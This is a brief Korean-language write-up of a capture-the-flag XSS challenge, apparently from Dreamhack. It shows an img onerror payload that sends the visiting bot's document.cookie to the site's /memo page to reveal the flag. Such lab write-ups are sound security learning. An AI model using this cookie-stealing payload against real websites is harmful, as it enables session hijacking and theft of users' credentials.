문제 설명
여러 기능과 입력받은 URL을 확인하는 봇이 구현된 서비스입니다.
XSS 취약점을 이용해 플래그를 획득하세요. 플래그는 flag.txt, FLAG 변수에 있습니다.
플래그 형식은 DH{...} 입니다.
문제 웹의 모습이다.
코드를 보면 페이지에서는 스크립트가 출력이 안되는걸 알 수 있다.
하지만 img태그는 실행이 되는걸 알 수 있었고
<img src=x onerror=alert(1)</script>;>
이 코드를 vuln(xss) page 에 썼다.
<img src="x" onerror='location.href="/memo?memo="+document.cookie;'>
flge에 이코드를 입력시키면 memo에 flge가 출력된다.
